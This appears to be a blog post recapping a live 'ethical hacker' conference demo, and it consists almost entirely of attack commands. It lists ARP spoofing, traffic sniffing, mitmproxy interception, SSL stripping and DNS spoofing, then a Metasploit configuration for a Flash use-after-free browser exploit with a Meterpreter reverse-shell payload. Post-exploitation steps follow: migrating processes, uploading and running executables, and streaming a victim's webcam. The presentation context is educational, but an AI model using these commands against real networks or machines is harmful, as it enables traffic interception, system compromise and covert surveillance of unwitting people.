DSS 2015 Riga

Ethical Hacker in Action @DSS2015 that took place in Riga on 22-Oct-2015:



I know that got failed a lot of times during this presentation. But I know, you gonna seal your webcam, anyway .)

There goes a list of exercises that were executed during this session:

  • Checking current IP configuration: ifconfig
  • Network host discovery: nmap -sP -T4 %IP_Subnet%
  • Enabling Forwarding, MitM requirement: sysctl net.ipv4.conf.all.forwarding=1
  • ARP Spoofing, both directions required: arpspoof -t %IP_Victim% %IP_Router%
  • URL Inspection: urlsnarf
  • Picture Interception: driftnet
  • Enabling port redirection for MitM Proxy: iptables -t nat -A PREROUTING -i eth0 -p tcp —dport 80 -j REDIRECT —to-port 8080
  • Running MitM Proxy: mitmproxy -T —host
  • Cancelling port redirection: iptables -t nat -D PREROUTING -i eth0 -p tcp —dport 80 -j REDIRECT —to-port 8080
  • Preventing redirection from HTTP to HTTPS: sslstrip -p -k -l 8000
  • DNS Spoofing: dnsspoof -f /root/Desktop/dns.txt
  • Launching Metasploit Framework console: msfconsole


Metasploit exploit configuration:

  • use exploit/multi/browser/adobe_flash_hacking_team_uaf
  • set target 0
  • set srvport 80
  • set uripath /
  • set payload windows/meterpreter/reverse_tcp
  • set lhost %IP_Hacker%
  • exploit
  • sessions -i 1


Metepreter commands executed on a victim machine:

  • Get current user name: getuid
  • Get process list: ps
  • Get current process ID: getpid
  • Migrate to another process: migrate %New_PID%
  • Get current working directory: getwd
  • Navigate to another folder: cd %Folder_Name%
  • Upload executable from attacker to a victim: upload %Executable_Name%
  • Execute remote executable: execute -f %Executable_Name%
  • Kill a process on a victim machine: kill %PID%
  • Disconnect from a session w/o closing it: background
  • List webcams on a victim machine: webcam_list
  • Capture video from a webcam: webcam_stream



Добавить комментарий

Заполните поля или щелкните по значку, чтобы оставить свой комментарий:

Логотип WordPress.com

Для комментария используется ваша учётная запись WordPress.com. Выход /  Изменить )

Фотография Facebook

Для комментария используется ваша учётная запись Facebook. Выход /  Изменить )

Connecting to %s

%d такие блоггеры, как: